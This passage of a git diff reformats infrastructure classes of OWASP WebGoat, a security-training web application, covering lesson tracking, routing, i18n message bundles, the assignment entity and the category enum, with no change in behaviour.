 }
diff --git a/src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java b/src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java
index 5b15965d9..4e76af9d6 100644
--- a/src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java
+++ b/src/main/java/org/owasp/webgoat/container/assignments/LessonTrackerInterceptor.java
@@ -36,39 +36,46 @@ import org.springframework.web.servlet.mvc.method.annotation.ResponseBodyAdvice;
 @RestControllerAdvice
 public class LessonTrackerInterceptor implements ResponseBodyAdvice<Object> {
 
-    private UserTrackerRepository userTrackerRepository;
-    private WebSession webSession;
+  private UserTrackerRepository userTrackerRepository;
+  private WebSession webSession;
 
-    public LessonTrackerInterceptor(UserTrackerRepository userTrackerRepository, WebSession webSession) {
-        this.userTrackerRepository = userTrackerRepository;
-        this.webSession = webSession;
+  public LessonTrackerInterceptor(
+      UserTrackerRepository userTrackerRepository, WebSession webSession) {
+    this.userTrackerRepository = userTrackerRepository;
+    this.webSession = webSession;
+  }
+
+  @Override
+  public boolean supports(
+      MethodParameter methodParameter, Class<? extends HttpMessageConverter<?>> clazz) {
+    return true;
+  }
+
+  @Override
+  public Object beforeBodyWrite(
+      Object o,
+      MethodParameter methodParameter,
+      MediaType mediaType,
+      Class<? extends HttpMessageConverter<?>> aClass,
+      ServerHttpRequest serverHttpRequest,
+      ServerHttpResponse serverHttpResponse) {
+    if (o instanceof AttackResult attackResult) {
+      trackProgress(attackResult);
     }
+    return o;
+  }
 
-    @Override
-    public boolean supports(MethodParameter methodParameter, Class<? extends HttpMessageConverter<?>> clazz) {
-        return true;
+  protected AttackResult trackProgress(AttackResult attackResult) {
+    UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
+    if (userTracker == null) {
+      userTracker = new UserTracker(webSession.getUserName());
     }
-
-    @Override
-    public Object beforeBodyWrite(Object o, MethodParameter methodParameter, MediaType mediaType, Class<? extends HttpMessageConverter<?>> aClass, ServerHttpRequest serverHttpRequest, ServerHttpResponse serverHttpResponse) {
-        if (o instanceof AttackResult attackResult) {
-            trackProgress(attackResult);
-        }
-        return o;
-    }
-
-
-    protected AttackResult trackProgress(AttackResult attackResult) {
-        UserTracker userTracker = userTrackerRepository.findByUser(webSession.getUserName());
-        if (userTracker == null) {
-            userTracker = new UserTracker(webSession.getUserName());
-        }
-        if (attackResult.assignmentSolved()) {
-            userTracker.assignmentSolved(webSession.getCurrentLesson(), attackResult.getAssignment());
-        } else {
-            userTracker.assignmentFailed(webSession.getCurrentLesson());
-        }
-        userTrackerRepository.saveAndFlush(userTracker);
-        return attackResult;
+    if (attackResult.assignmentSolved()) {
+      userTracker.assignmentSolved(webSession.getCurrentLesson(), attackResult.getAssignment());
+    } else {
+      userTracker.assignmentFailed(webSession.getCurrentLesson());
     }
+    userTrackerRepository.saveAndFlush(userTracker);
+    return attackResult;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/controller/StartLesson.java b/src/main/java/org/owasp/webgoat/container/controller/StartLesson.java
index 8093a9d03..7d94f6044 100644
--- a/src/main/java/org/owasp/webgoat/container/controller/StartLesson.java
+++ b/src/main/java/org/owasp/webgoat/container/controller/StartLesson.java
@@ -1,36 +1,37 @@
 /**
  * ************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author WebGoat
  * @version $Id: $Id
  * @since October 28, 2003
  */
-
 package org.owasp.webgoat.container.controller;
 
+import javax.servlet.http.HttpServletRequest;
 import org.owasp.webgoat.container.session.Course;
 import org.owasp.webgoat.container.session.WebSession;
 import org.springframework.stereotype.Controller;
@@ -38,52 +39,52 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.servlet.ModelAndView;
 
-import javax.servlet.http.HttpServletRequest;
-
-
 @Controller
 public class StartLesson {
 
-    private final WebSession ws;
-    private final Course course;
+  private final WebSession ws;
+  private final Course course;
 
-    public StartLesson(WebSession ws, Course course) {
-        this.ws = ws;
-        this.course = course;
-    }
+  public StartLesson(WebSession ws, Course course) {
+    this.ws = ws;
+    this.course = course;
+  }
 
-    /**
-     * <p>start.</p>
-     *
-     * @return a {@link ModelAndView} object.
-     */
-    @RequestMapping(path = "startlesson.mvc", method = {RequestMethod.GET, RequestMethod.POST})
-    public ModelAndView start() {
-        var model = new ModelAndView();
+  /**
+   * start.
+   *
+   * @return a {@link ModelAndView} object.
+   */
+  @RequestMapping(
+      path = "startlesson.mvc",
+      method = {RequestMethod.GET, RequestMethod.POST})
+  public ModelAndView start() {
+    var model = new ModelAndView();
 
-        model.addObject("course", course);
-        model.addObject("lesson", ws.getCurrentLesson());
-        model.setViewName("lesson_content");
+    model.addObject("course", course);
+    model.addObject("lesson", ws.getCurrentLesson());
+    model.setViewName("lesson_content");
 
-        return model;
-    }
+    return model;
+  }
 
-    @RequestMapping(value = {"*.lesson"}, produces = "text/html")
-    public ModelAndView lessonPage(HttpServletRequest request) {
-        var model = new ModelAndView("lesson_content");
-        var path = request.getRequestURL().toString(); // we now got /a/b/c/AccessControlMatrix.lesson
-        var lessonName = path.substring(path.lastIndexOf('/') + 1, path.indexOf(".lesson"));
+  @RequestMapping(
+      value = {"*.lesson"},
+      produces = "text/html")
+  public ModelAndView lessonPage(HttpServletRequest request) {
+    var model = new ModelAndView("lesson_content");
+    var path = request.getRequestURL().toString(); // we now got /a/b/c/AccessControlMatrix.lesson
+    var lessonName = path.substring(path.lastIndexOf('/') + 1, path.indexOf(".lesson"));
 
-        course.getLessons()
-                .stream()
-                .filter(l -> l.getId().equals(lessonName))
-                .findFirst()
-                .ifPresent(lesson -> {
-                    ws.setCurrentLesson(lesson);
-                    model.addObject("lesson", lesson);
-                });
-
-        return model;
-    }
+    course.getLessons().stream()
+        .filter(l -> l.getId().equals(lessonName))
+        .findFirst()
+        .ifPresent(
+            lesson -> {
+              ws.setCurrentLesson(lesson);
+              model.addObject("lesson", lesson);
+            });
 
+    return model;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/controller/Welcome.java b/src/main/java/org/owasp/webgoat/container/controller/Welcome.java
index 1ea65f3ee..fddc5f640 100644
--- a/src/main/java/org/owasp/webgoat/container/controller/Welcome.java
+++ b/src/main/java/org/owasp/webgoat/container/controller/Welcome.java
@@ -1,45 +1,42 @@
 /**
- *************************************************************************************************
+ * ************************************************************************************************
  *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
  *
- * Copyright (c) 2002 - 2014 Bruce Mayhew
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
  *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
  *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
  *
- * You should have received a copy of the GNU General Public License along with this program; if
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
  *
- * Getting Source ==============
+ * <p>Getting Source ==============
  *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  *
  * @author WebGoat
  * @since October 28, 2003
  * @version $Id: $Id
  */
-
 package org.owasp.webgoat.container.controller;
 
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpSession;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.servlet.ModelAndView;
 
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpSession;
-
 /**
- * <p>Welcome class.</p>
+ * Welcome class.
  *
  * @author rlawson
  * @version $Id: $Id
@@ -47,29 +44,28 @@ import javax.servlet.http.HttpSession;
 @Controller
 public class Welcome {
 
-    private static final String WELCOMED = "welcomed";
-    
-    /**
-     * <p>welcome.</p>
-     *
-     * @param request a {@link javax.servlet.http.HttpServletRequest} object.
-     * @return a {@link org.springframework.web.servlet.ModelAndView} object.
-     */
-    @GetMapping(path = {"welcome.mvc"})
-    public ModelAndView welcome(HttpServletRequest request) {
+  private static final String WELCOMED = "welcomed";
 
-        // set the welcome attribute
-        // this is so the attack servlet does not also 
-        // send them to the welcome page
-        HttpSession session = request.getSession();
-        if (session.getAttribute(WELCOMED) == null) {
-            session.setAttribute(WELCOMED, "true");
-        }
-        
-        //go ahead and send them to webgoat (skip the welcome page)
-        ModelAndView model = new ModelAndView();
-        model.setViewName("forward:/attack?start=true");
-        return model;
+  /**
+   * welcome.
+   *
+   * @param request a {@link javax.servlet.http.HttpServletRequest} object.
+   * @return a {@link org.springframework.web.servlet.ModelAndView} object.
+   */
+  @GetMapping(path = {"welcome.mvc"})
+  public ModelAndView welcome(HttpServletRequest request) {
+
+    // set the welcome attribute
+    // this is so the attack servlet does not also
+    // send them to the welcome page
+    HttpSession session = request.getSession();
+    if (session.getAttribute(WELCOMED) == null) {
+      session.setAttribute(WELCOMED, "true");
     }
-    
+
+    // go ahead and send them to webgoat (skip the welcome page)
+    ModelAndView model = new ModelAndView();
+    model.setViewName("forward:/attack?start=true");
+    return model;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/i18n/Language.java b/src/main/java/org/owasp/webgoat/container/i18n/Language.java
index 5b73e0755..76e2a9728 100644
--- a/src/main/java/org/owasp/webgoat/container/i18n/Language.java
+++ b/src/main/java/org/owasp/webgoat/container/i18n/Language.java
@@ -25,15 +25,15 @@
 
 package org.owasp.webgoat.container.i18n;
 
+import java.util.Locale;
 import lombok.AllArgsConstructor;
 import org.springframework.web.context.request.RequestContextHolder;
 import org.springframework.web.context.request.ServletRequestAttributes;
 import org.springframework.web.servlet.LocaleResolver;
-import java.util.Locale;
 
 /**
- * Wrapper around the LocaleResolver from Spring so we do not need to bother with passing the HttpRequest object
- * when asking for a Locale.
+ * Wrapper around the LocaleResolver from Spring so we do not need to bother with passing the
+ * HttpRequest object when asking for a Locale.
  *
  * @author nbaars
  * @date 2/7/17
@@ -41,9 +41,10 @@ import java.util.Locale;
 @AllArgsConstructor
 public class Language {
 
-    private final LocaleResolver localeResolver;
+  private final LocaleResolver localeResolver;
 
-    public Locale getLocale() {
-        return localeResolver.resolveLocale(((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());
-    }
+  public Locale getLocale() {
+    return localeResolver.resolveLocale(
+        ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest());
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/i18n/Messages.java b/src/main/java/org/owasp/webgoat/container/i18n/Messages.java
index 04a3b3ad5..5fd9c9c92 100644
--- a/src/main/java/org/owasp/webgoat/container/i18n/Messages.java
+++ b/src/main/java/org/owasp/webgoat/container/i18n/Messages.java
@@ -25,36 +25,35 @@
 
 package org.owasp.webgoat.container.i18n;
 
+import java.util.Properties;
 import lombok.AllArgsConstructor;
 import org.springframework.context.support.ReloadableResourceBundleMessageSource;
 
-import java.util.Properties;
-
 /**
- * <p>ExposedReloadableResourceMessageBundleSource class.</p>
- * Extends the reloadable message source with a way to get all messages
+ * ExposedReloadableResourceMessageBundleSource class. Extends the reloadable message source with a
+ * way to get all messages
  *
  * @author zupzup
  */
 @AllArgsConstructor
 public class Messages extends ReloadableResourceBundleMessageSource {
 
-    private final Language language;
+  private final Language language;
 
-    /**
-     * Gets all messages for presented Locale.
-     *
-     * @return all messages
-     */
-    public Properties getMessages() {
-        return getMergedProperties(language.getLocale()).getProperties();
-    }
+  /**
+   * Gets all messages for presented Locale.
+   *
+   * @return all messages
+   */
+  public Properties getMessages() {
+    return getMergedProperties(language.getLocale()).getProperties();
+  }
 
-    public String getMessage(String code, Object... args) {
-        return getMessage(code, args, language.getLocale());
-    }
+  public String getMessage(String code, Object... args) {
+    return getMessage(code, args, language.getLocale());
+  }
 
-    public String getMessage(String code, String defaultValue, Object... args) {
-        return super.getMessage(code, args, defaultValue, language.getLocale());
-    }
+  public String getMessage(String code, String defaultValue, Object... args) {
+    return super.getMessage(code, args, defaultValue, language.getLocale());
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java b/src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java
index e0c6d3583..16df55cb2 100644
--- a/src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java
+++ b/src/main/java/org/owasp/webgoat/container/i18n/PluginMessages.java
@@ -25,11 +25,10 @@
 
 package org.owasp.webgoat.container.i18n;
 
-import org.springframework.context.support.ReloadableResourceBundleMessageSource;
-import org.springframework.core.io.support.ResourcePatternResolver;
-
 import java.io.IOException;
 import java.util.Properties;
+import org.springframework.context.support.ReloadableResourceBundleMessageSource;
+import org.springframework.core.io.support.ResourcePatternResolver;
 
 /**
  * Message resource bundle for plugins.
@@ -38,49 +37,49 @@ import java.util.Properties;
  * @date 2/4/17
  */
 public class PluginMessages extends ReloadableResourceBundleMessageSource {
-    private static final String PROPERTIES_SUFFIX = ".properties";
+  private static final String PROPERTIES_SUFFIX = ".properties";
 
-    private final Language language;
-    private final ResourcePatternResolver resourcePatternResolver;
+  private final Language language;
+  private final ResourcePatternResolver resourcePatternResolver;
 
+  public PluginMessages(
+      Messages messages, Language language, ResourcePatternResolver resourcePatternResolver) {
+    this.language = language;
+    this.setParentMessageSource(messages);
+    this.setBasename("WebGoatLabels");
+    this.resourcePatternResolver = resourcePatternResolver;
+  }
 
-    public PluginMessages(Messages messages, Language language, ResourcePatternResolver resourcePatternResolver) {
-        this.language = language;
-        this.setParentMessageSource(messages);
-        this.setBasename("WebGoatLabels");
-        this.resourcePatternResolver = resourcePatternResolver;
+  @Override
+  protected PropertiesHolder refreshProperties(String filename, PropertiesHolder propHolder) {
+    Properties properties = new Properties();
+    long lastModified = System.currentTimeMillis();
+
+    try {
+      var resources =
+          resourcePatternResolver.getResources(
+              "classpath:/lessons/**/i18n" + "/WebGoatLabels" + PROPERTIES_SUFFIX);
+      for (var resource : resources) {
+        String sourcePath = resource.getURI().toString().replace(PROPERTIES_SUFFIX, "");
+        PropertiesHolder holder = super.refreshProperties(sourcePath, propHolder);
+        properties.putAll(holder.getProperties());
+      }
+    } catch (IOException e) {
+      logger.error("Unable to read plugin message", e);
     }
 
-    @Override
-    protected PropertiesHolder refreshProperties(String filename, PropertiesHolder propHolder) {
-        Properties properties = new Properties();
-        long lastModified = System.currentTimeMillis();
+    return new PropertiesHolder(properties, lastModified);
+  }
 
-        try {
-            var resources = resourcePatternResolver.getResources("classpath:/lessons/**/i18n" +
-                    "/WebGoatLabels" + PROPERTIES_SUFFIX);
-            for (var resource : resources) {
-                String sourcePath = resource.getURI().toString().replace(PROPERTIES_SUFFIX, "");
-                PropertiesHolder holder = super.refreshProperties(sourcePath, propHolder);
-                properties.putAll(holder.getProperties());
-            }
-        } catch (IOException e) {
-            logger.error("Unable to read plugin message", e);
-        }
+  public Properties getMessages() {
+    return getMergedProperties(language.getLocale()).getProperties();
+  }
 
-        return new PropertiesHolder(properties, lastModified);
-    }
+  public String getMessage(String code, Object... args) {
+    return getMessage(code, args, language.getLocale());
+  }
 
-
-    public Properties getMessages() {
-        return getMergedProperties(language.getLocale()).getProperties();
-    }
-
-    public String getMessage(String code, Object... args) {
-        return getMessage(code, args, language.getLocale());
-    }
-
-    public String getMessage(String code, String defaultValue, Object... args) {
-        return super.getMessage(code, args, defaultValue, language.getLocale());
-    }
+  public String getMessage(String code, String defaultValue, Object... args) {
+    return super.getMessage(code, args, defaultValue, language.getLocale());
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Assignment.java b/src/main/java/org/owasp/webgoat/container/lessons/Assignment.java
index f7f726186..92e8d0e9e 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/Assignment.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Assignment.java
@@ -1,34 +1,34 @@
 package org.owasp.webgoat.container.lessons;
 
-import lombok.*;
-
-import javax.persistence.*;
 import java.util.ArrayList;
 import java.util.List;
+import javax.persistence.*;
+import lombok.*;
 
 /**
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author nbaars
@@ -40,30 +40,33 @@ import java.util.List;
 @Entity
 public class Assignment {
 
-    @Id
-    @GeneratedValue(strategy = GenerationType.AUTO)
-    private Long id;
-    private String name;
-    private String path;
+  @Id
+  @GeneratedValue(strategy = GenerationType.AUTO)
+  private Long id;
 
-    @Transient
-    private List<String> hints;
+  private String name;
+  private String path;
 
-    private Assignment() {
-        //Hibernate
+  @Transient private List<String> hints;
+
+  private Assignment() {
+    // Hibernate
+  }
+
+  public Assignment(String name) {
+    this(name, name, new ArrayList<>());
+  }
+
+  public Assignment(String name, String path, List<String> hints) {
+    if (path.equals("") || path.equals("/") || path.equals("/WebGoat/")) {
+      throw new IllegalStateException(
+          "The path of assignment '"
+              + name
+              + "' overrides WebGoat endpoints, please choose a path within the scope of the"
+              + " lesson");
     }
-
-    public Assignment(String name) {
-        this(name, name, new ArrayList<>());
-    }
-
-    public Assignment(String name, String path, List<String> hints) {
-        if (path.equals("") || path.equals("/") || path.equals("/WebGoat/")) {
-            throw new IllegalStateException("The path of assignment '" + name + "' overrides WebGoat endpoints, please choose a path within the scope of the lesson");
-        }
-        this.name = name;
-        this.path = path;
-        this.hints = hints;
-    }
-
+    this.name = name;
+    this.path = path;
+    this.hints = hints;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Category.java b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
index 30cccd889..8b4d64ee1 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/Category.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Category.java
@@ -4,30 +4,29 @@ import lombok.Getter;
 
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
  * for free software projects.
  *
  * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
@@ -35,40 +34,35 @@ import lombok.Getter;
  * @since October 28, 2003
  */
 public enum Category {
+  INTRODUCTION("Introduction", 5),
+  GENERAL("General", 100),
 
-    INTRODUCTION("Introduction", 5),
-    GENERAL("General", 100),
-    
-    A1("(A1) Broken Access Control", 301),
-    A2("(A2) Cryptographic Failures", 302),
-    A3("(A3) Injection", 303),
+  A1("(A1) Broken Access Control", 301),
+  A2("(A2) Cryptographic Failures", 302),
+  A3("(A3) Injection", 303),
 
-    A5("(A5) Security Misconfiguration", 305),
-    A6("(A6) Vuln & Outdated Components", 306),
-    A7("(A7) Identity & Auth Failure", 307),
-    A8("(A8) Software & Data Integrity", 308),
-    A9("(A9) Security Logging Failures", 309),
-    A10("(A10) Server-side Request Forgery", 310),    
-    
-    CLIENT_SIDE("Client side", 1700),
+  A5("(A5) Security Misconfiguration", 305),
+  A6("(A6) Vuln & Outdated Components", 306),
+  A7("(A7) Identity & Auth Failure", 307),
+  A8("(A8) Software & Data Integrity", 308),
+  A9("(A9) Security Logging Failures", 309),
+  A10("(A10) Server-side Request Forgery", 310),
 
-    CHALLENGE("Challenges", 3000);
+  CLIENT_SIDE("Client side", 1700),
 
-    @Getter
-    private String name;
-    @Getter
-    private Integer ranking;
+  CHALLENGE("Challenges", 3000);
 
-    Category(String name, Integer ranking) {
-        this.name = name;
-        this.ranking = ranking;
-    }
+  @Getter private String name;
+  @Getter private Integer ranking;
 
-    /**
-     * {@inheritDoc}
-     */
-    @Override
-    public String toString() {
-        return getName();
-    }
+  Category(String name, Integer ranking) {
+    this.name = name;
+    this.ranking = ranking;
+  }
+
+  /** {@inheritDoc} */
+  @Override
+  public String toString() {
+    return getName();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java b/src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java
index fccc1fa16..c6be7cfad 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/CourseConfiguration.java
@@ -22,6 +22,11 @@
 
 package org.owasp.webgoat.container.lessons;
 
+import static java.util.stream.Collectors.groupingBy;
+
+import java.lang.reflect.Method;
+import java.lang.reflect.ParameterizedType;
+import java.util.*;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang3.ArrayUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -36,91 +41,103 @@ import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.PutMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 
-import java.lang.reflect.Method;
-import java.lang.reflect.ParameterizedType;
-import java.util.*;
-
-import static java.util.stream.Collectors.groupingBy;
-import static java.util.stream.Collectors.toList;
-
 @Slf4j
 @Configuration
 public class CourseConfiguration {
 
-    private final List<Lesson> lessons;
-    private final List<AssignmentEndpoint> assignments;
-    private final Map<String, List<AssignmentEndpoint>> assignmentsByPackage;
+  private final List<Lesson> lessons;
+  private final List<AssignmentEndpoint> assignments;
+  private final Map<String, List<AssignmentEndpoint>> assignmentsByPackage;
 
-    public CourseConfiguration(List<Lesson> lessons, List<AssignmentEndpoint> assignments) {
-        this.lessons = lessons;
-        this.assignments = assignments;
-        assignmentsByPackage = this.assignments.stream().collect(groupingBy(a -> a.getClass().getPackageName()));
-    }
+  public CourseConfiguration(List<Lesson> lessons, List<AssignmentEndpoint> assignments) {
+    this.lessons = lessons;
+    this.assignments = assignments;
+    assignmentsByPackage =
+        this.assignments.stream().collect(groupingBy(a -> a.getClass().getPackageName()));
+  }
 
-    @Bean
-    public Course course() {
-        lessons.stream().forEach(l -> l.setAssignments(createAssignment(l)));
-        return new Course(lessons);
-    }
+  @Bean
+  public Course course() {
+    lessons.stream().forEach(l -> l.setAssignments(createAssignment(l)));
+    return new Course(lessons);
+  }
 
-    private List<Assignment> createAssignment(Lesson lesson) {
-        var endpoints = assignmentsByPackage.get(lesson.getClass().getPackageName());
-        if (CollectionUtils.isEmpty(endpoints)) {
-            log.warn("Lesson: {} has no endpoints, is this intentionally?", lesson.getTitle());
-            return new ArrayList<>();
-        }
-        return endpoints.stream()
-                .map(e -> new Assignment(e.getClass().getSimpleName(), getPath(e.getClass()), getHints(e.getClass())))
-                .toList();
+  private List<Assignment> createAssignment(Lesson lesson) {
+    var endpoints = assignmentsByPackage.get(lesson.getClass().getPackageName());
+    if (CollectionUtils.isEmpty(endpoints)) {
+      log.warn("Lesson: {} has no endpoints, is this intentionally?", lesson.getTitle());
+      return new ArrayList<>();
     }
+    return endpoints.stream()
+        .map(
+            e ->
+                new Assignment(
+                    e.getClass().getSimpleName(), getPath(e.getClass()), getHints(e.getClass())))
+        .toList();
+  }
 
-    private String getPath(Class<? extends AssignmentEndpoint> e) {
-        for (Method m : e.getMethods()) {
-            if (methodReturnTypeIsOfTypeAttackResult(m)) {
-                var mapping = getMapping(m);
-                if (mapping != null) {
-                    return mapping;
-                }
-            }
+  private String getPath(Class<? extends AssignmentEndpoint> e) {
+    for (Method m : e.getMethods()) {
+      if (methodReturnTypeIsOfTypeAttackResult(m)) {
+        var mapping = getMapping(m);
+        if (mapping != null) {
+          return mapping;
         }
-        throw new IllegalStateException("Assignment endpoint: " + e + " has no mapping like @GetMapping/@PostMapping etc," +
-                "with return type 'AttackResult' or 'ResponseEntity<AttackResult>' please consider adding one");
+      }
     }
+    throw new IllegalStateException(
+        "Assignment endpoint: "
+            + e
+            + " has no mapping like @GetMapping/@PostMapping etc,with return type 'AttackResult' or"
+            + " 'ResponseEntity<AttackResult>' please consider adding one");
+  }
 
-    private boolean methodReturnTypeIsOfTypeAttackResult(Method m) {
-        if (m.getReturnType() == AttackResult.class) {
-            return true;
-        }
-        var genericType = m.getGenericReturnType();
-        if (genericType instanceof ParameterizedType) {
-            return ((ParameterizedType) m.getGenericReturnType()).getActualTypeArguments()[0] == AttackResult.class;
-        }
-        return false;
+  private boolean methodReturnTypeIsOfTypeAttackResult(Method m) {
+    if (m.getReturnType() == AttackResult.class) {
+      return true;
     }
+    var genericType = m.getGenericReturnType();
+    if (genericType instanceof ParameterizedType) {
+      return ((ParameterizedType) m.getGenericReturnType()).getActualTypeArguments()[0]
+          == AttackResult.class;
+    }
+    return false;
+  }
 
-    private String getMapping(Method m) {
-        String[] paths = null;
-        //Find the path, either it is @GetMapping("/attack") of GetMapping(path = "/attack") both are valid, we need to consider both
-        if (m.getAnnotation(RequestMapping.class) != null) {
-            paths = ArrayUtils.addAll(m.getAnnotation(RequestMapping.class).value(), m.getAnnotation(RequestMapping.class).path());
-        } else if (m.getAnnotation(PostMapping.class) != null) {
